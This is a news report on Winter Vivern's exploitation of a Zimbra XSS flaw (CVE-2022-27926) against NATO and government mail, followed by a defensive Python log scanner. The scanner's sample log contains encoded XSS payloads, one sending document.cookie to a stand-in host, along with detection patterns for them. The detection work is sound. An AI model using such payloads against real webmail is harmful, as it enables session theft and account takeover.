A Russian hacking group tracked as Winter Vivern (aka TA473) has been actively exploiting a vulnerability, CVE-2022-27926, in unpatched Zimbra instances to gain access to the email of NATO officials, governments, military personnel, and diplomats.
CVE-2022-27926 is a reflected cross-site scripting (XSS) flaw in Zimbra Collaboration version 9.0.0, a product commonly used to host publicly facing webmail portals.
The attackers can also use the compromised accounts to carry out lateral phishing attacks and infiltrate the target organizations further.
TA473’s cyber operations align with the support of Russian and/or Belarussian geopolitical goals.
The XSS payloads allow the actors to steal usernames and passwords and to capture active session and CSRF tokens from cookies (possible only where those cookies are not flagged HttpOnly), enabling them to log in to the vulnerable publicly facing webmail portals of the target organizations.
The APT group uses scanning tools like Acunetix to identify unpatched webmail platforms used by target organizations.
The threat actors send phishing emails from a compromised address, spoofed so that the sender appears to be someone relevant to the target organization; the message carries a link that triggers the XSS exploit in the recipient's browser.
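Because the exploit chain described above (scan for an unpatched portal, phish a user, reflect a script payload through a webmail URL) leaves the crafted request in the web server's access log, a defender can hunt for it there. The following Python scanner is an added example written for this page; it is not code from the original article, from Proofpoint, or from Zimbra. It decodes each query parameter (repeatedly, to defeat double encoding) and flags requests to a webmail path whose parameters contain script-injection markers. The `/zimbra/` path prefix, the log lines and the payload strings are constructed for illustration and are not the actual CVE-2022-27926 endpoint or the group's real payloads; substitute the vulnerable path from the vendor advisory in a real deployment.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed NCSA combined-format access-log lines for illustration only.
# The request paths and payloads are hypothetical, not the real CVE-2022-27926 endpoint.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Mar/2023:09:12:01 +0000] "GET /zimbra/?q=hello HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.11 - - [10/Mar/2023:09:12:07 +0000] "GET /zimbra/?msg=%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fexample.invalid%2F%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.12 - - [10/Mar/2023:09:12:09 +0000] "GET /zimbra/?x=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2023:09:13:44 +0000] "GET /zimbra/?z=normal%20text HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Minimal parser for the combined log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Indicators of reflected-XSS payloads in a decoded parameter value.
XSS_INDICATORS = [
    ("script-tag", re.compile(r"<\s*script", re.I)),
    ("event-handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("javascript-uri", re.compile(r"javascript\s*:", re.I)),
    ("cookie-access", re.compile(r"document\.cookie", re.I)),
]


def full_decode(value, max_rounds=3):
    """URL-decode repeatedly until the value is stable, so %253C becomes '<'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(target):
    """Return [(param, decoded_value, [indicator labels])] for a request target."""
    query = urlsplit(target).query
    findings = []
    # parse_qsl performs one decoding pass; full_decode handles extra layers.
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = full_decode(raw)
        labels = [label for label, pattern in XSS_INDICATORS if pattern.search(value)]
        if labels:
            findings.append((name, value, labels))
    return findings


def scan_log(text, path_prefix="/zimbra/"):
    """Scan access-log text and return one alert per request with XSS markers."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse as access-log records
        target = m.group("target")
        if not target.startswith(path_prefix):
            continue  # only the webmail application path is of interest
        findings = suspicious_params(target)
        if findings:
            alerts.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "params": [name for name, _, _ in findings],
                "matched": sorted({label for _, _, labels in findings for label in labels}),
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"{alert['ts']} {alert['ip']} params={alert['params']} matched={alert['matched']}")
```

A hit from this scanner is a signal, not a verdict: a reflected-XSS probe logged with a 200 status against an unpatched instance warrants checking the Zimbra version, invalidating sessions for any user who followed the link, and reviewing mailbox access from the client IPs involved.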
(SecurityAffairs – hacking, NATO)